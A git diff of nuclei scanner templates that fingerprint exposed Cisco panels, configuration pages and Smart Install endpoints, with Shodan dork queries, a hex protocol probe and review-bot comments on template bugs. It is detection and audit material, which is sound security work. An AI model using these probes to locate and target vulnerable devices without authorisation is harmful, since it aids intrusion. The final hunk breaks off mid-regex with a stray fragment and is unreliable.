diff --git a/nuclei-templates/Other/cisco-edge-340-936.yaml b/nuclei-templates/Other/cisco-edge-340-936.yaml
deleted file mode 100644
index 9ab8a34c07..0000000000
--- a/nuclei-templates/Other/cisco-edge-340-936.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: cisco-edge-340
-info:
- name: Cisco Edge 340
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Cisco Edge 340"
- tags: panel,cisco
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/auth/?next=%2F"
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "
Cisco Edge 340"
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-edge-340.yaml b/nuclei-templates/Other/cisco-edge-340.yaml
new file mode 100644
index 0000000000..17a60b6a18
--- /dev/null
+++ b/nuclei-templates/Other/cisco-edge-340.yaml
@@ -0,0 +1,25 @@
+id: cisco-edge-340
+
+info:
+ name: Cisco Edge 340
+ author: dhiyaneshDk
+ severity: info
+ tags: panel,cisco
+ metadata:
+ shodan-query: 'http.title:"Cisco Edge 340"'
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/auth/?next=%2F"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "
Cisco Edge 340"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-finesse-login-938.yaml b/nuclei-templates/Other/cisco-finesse-login-940.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-finesse-login-938.yaml
rename to nuclei-templates/Other/cisco-finesse-login-940.yaml
diff --git a/nuclei-templates/Other/cisco-integrated-login-941.yaml b/nuclei-templates/Other/cisco-integrated-login.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-integrated-login-941.yaml
rename to nuclei-templates/Other/cisco-integrated-login.yaml
diff --git a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml b/nuclei-templates/Other/cisco-meraki-exposure-944.yaml
deleted file mode 100644
index d14835d3a6..0000000000
--- a/nuclei-templates/Other/cisco-meraki-exposure-944.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: cisco-meraki-exposure
-
-info:
- name: Cisco Meraki cloud & security Appliances Information Disclosure
- author: dhiyaneshDK,r3naissance
- severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6708
- tags: panel,cisco,meraki,disclosure
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/#connection'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Your client connection'
- - 'This security appliance is directly connected to a local network'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-meraki-exposure-946.yaml b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
new file mode 100644
index 0000000000..112800ebd8
--- /dev/null
+++ b/nuclei-templates/Other/cisco-meraki-exposure-946.yaml
@@ -0,0 +1,25 @@
+id: cisco-meraki-exposure
+
+info:
+ name: Cisco Meraki cloud & security Appliances Information Disclosure
+ author: dhiyaneshDK,r3naissance
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6708
+ tags: panel,cisco,meraki,disclosure
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#connection'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Your client connection'
+ - 'This security appliance is directly connected to a local network'
+ condition: and
+
+ - type: status
+ status:
+ - 200
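Review bot: The `#connection` fragment in `'{{BaseURL}}/#connection'` is never transmitted — an HTTP client strips everything after `#` before sending — so the request that actually goes out is `{{BaseURL}}/` and the two body words are matched against the root page. If the Meraki status text is served at `/` this works by accident and the path should read `'{{BaseURL}}/'` so the intent is clear; if a real server-side path is needed it has to come before the fragment. This copy also reverts `reference:` from a list (as in the deleted copy above) to a scalar, inconsistent with the other templates in this commit.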
diff --git a/nuclei-templates/Other/cisco-network-config-949.yaml b/nuclei-templates/Other/cisco-network-config-949.yaml
deleted file mode 100644
index 04d2a4045e..0000000000
--- a/nuclei-templates/Other/cisco-network-config-949.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: cisco-network-config
-
-info:
- name: Cisco System Network Configuration Exposure
- author: DhiyaneshDk
- severity: low
- reference: https://www.exploit-db.com/ghdb/5430
- tags: config,exposure,cisco,network
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Network Configuration"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-network-config-951.yaml b/nuclei-templates/Other/cisco-network-config-951.yaml
new file mode 100644
index 0000000000..0de9a2b420
--- /dev/null
+++ b/nuclei-templates/Other/cisco-network-config-951.yaml
@@ -0,0 +1,25 @@
+id: cisco-network-config
+
+info:
+ name: Cisco System Network Configuration Exposure
+ author: DhiyaneshDk
+ severity: low
+ reference:
+ - https://www.exploit-db.com/ghdb/5430
+ tags: config,exposure,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Network Configuration"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-prime-infrastructure.yaml b/nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-prime-infrastructure.yaml
rename to nuclei-templates/Other/cisco-prime-infrastructure-954.yaml
diff --git a/nuclei-templates/Other/cisco-secure-desktop-960.yaml b/nuclei-templates/Other/cisco-secure-desktop-962.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-secure-desktop-960.yaml
rename to nuclei-templates/Other/cisco-secure-desktop-962.yaml
diff --git a/nuclei-templates/Other/cisco-sendgrid-967.yaml b/nuclei-templates/Other/cisco-sendgrid-967.yaml
deleted file mode 100644
index d9708bf9f3..0000000000
--- a/nuclei-templates/Other/cisco-sendgrid-967.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: cisco-sendgrid
-
-info:
- name: Cisco ServiceGrid
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
- tags: panel,cisco
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/pages/sdcall/Login.jsp'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - '(?m)^
Cisco ServiceGrid (.*)<\/title>$'
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - 'Version ([0-9.]+)<\/div>'
diff --git a/nuclei-templates/Other/cisco-sendgrid-969.yaml b/nuclei-templates/Other/cisco-sendgrid-969.yaml
new file mode 100644
index 0000000000..7148f305d0
--- /dev/null
+++ b/nuclei-templates/Other/cisco-sendgrid-969.yaml
@@ -0,0 +1,31 @@
+id: cisco-sendgrid
+
+info:
+ name: Cisco ServiceGrid
+ author: dhiyaneshDK
+ severity: info
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/pages/sdcall/Login.jsp'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^
Cisco ServiceGrid (.*)<\/title>$'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Version ([0-9.]+)<\/div>'
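Review bot: `id: cisco-sendgrid` names an unrelated product; everything else in the file (`name:`, the title regex) fingerprints Cisco ServiceGrid, and since this is a new file the id can still be corrected to `id: cisco-servicegrid` without breaking existing references. The Shodan search URL under `reference:` is a query rather than a source — move it to `metadata:` as `shodan-query: http.title:"Cisco ServiceGrid"`, as the other panel templates in this diff do, so tooling that reads that field can use it. The title regex and the `Version ([0-9.]+)` extractor are unchanged from the deleted copy.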
diff --git a/nuclei-templates/Other/cisco-smi-exposure-972.yaml b/nuclei-templates/Other/cisco-smi-exposure-972.yaml
deleted file mode 100644
index c5a6584dd8..0000000000
--- a/nuclei-templates/Other/cisco-smi-exposure-972.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: cisco-smi-exposure
-
-info:
- name: Cisco Smart Install Endpoints Exposure
- author: dwisiswant0
- severity: info
- description: Cisco Smart Install endpoints were discovered. Exposure of SMI to untrusted networks could allow complete compromise of the switch.
- reference:
- - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
- - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature
- - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
- - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
- - https://github.com/Sab0tag3d/SIET
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
- cwe-id: CWE-200
- tags: network,cisco,smi,exposure
-
-network:
- - inputs:
- - data: "000000010000000100000004000000080000000100000000"
- type: hex
-
- host:
- - "{{Hostname}}"
- - "{{Host}}:4786"
-
- matchers:
- - type: word
- encoding: hex
- words:
- - "000000040000000000000003000000080000000100000000"
-
-# Enhanced by mp on 2022/03/30
diff --git a/nuclei-templates/Other/cisco-smi-exposure.yaml b/nuclei-templates/Other/cisco-smi-exposure.yaml
new file mode 100644
index 0000000000..212bbf0f1b
--- /dev/null
+++ b/nuclei-templates/Other/cisco-smi-exposure.yaml
@@ -0,0 +1,33 @@
+id: cisco-smi-exposure
+
+info:
+ name: Cisco Smart Install Endpoints Exposure
+ author: dwisiswant0
+ severity: info
+ description: |
+ This template attempts & supports the detection part only by
+ connecting to the specified Cisco Smart Install port and determines
+ if it speaks the Smart Install Protocol. Exposure of SMI to
+ untrusted networks can allow complete compromise of the switch.
+ reference:
+ - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
+ - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature
+ - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
+ - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
+ - https://github.com/Sab0tag3d/SIET
+ tags: network,cisco,smi,exposure
+
+network:
+ - inputs:
+ - data: "000000010000000100000004000000080000000100000000"
+ type: hex
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:4786"
+
+ matchers:
+ - type: word
+ encoding: hex
+ words:
+ - "000000040000000000000003000000080000000100000000"
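Review bot: The second host entry changes from `{{Host}}:4786` (deleted copy, previous hunk) to `{{Hostname}}:4786`; in nuclei network templates `{{Hostname}}` already carries the port when the input has one, so a target given as `host:port` expands to `host:port:4786` and the probe on the Smart Install port never reaches it — revert to `- "{{Host}}:4786"`. This copy also drops the `classification:` block (CVSS vector and CWE-200), a metadata regression; the hex probe and the response matcher are unchanged.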
diff --git a/nuclei-templates/Other/cisco-systems-login-973.yaml b/nuclei-templates/Other/cisco-systems-login-973.yaml
new file mode 100644
index 0000000000..96ae7b9ee4
--- /dev/null
+++ b/nuclei-templates/Other/cisco-systems-login-973.yaml
@@ -0,0 +1,32 @@
+id: cisco-systems-login
+
+info:
+ name: Cisco Systems Login
+ author: dhiyaneshDk,idealphase
+ severity: info
+ metadata:
+ shodan-query: http.title:"Cisco Systems Login"
+ google-query: intitle:"Cisco Systems Login"
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Cisco Systems Login"
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - ' : DIR-850L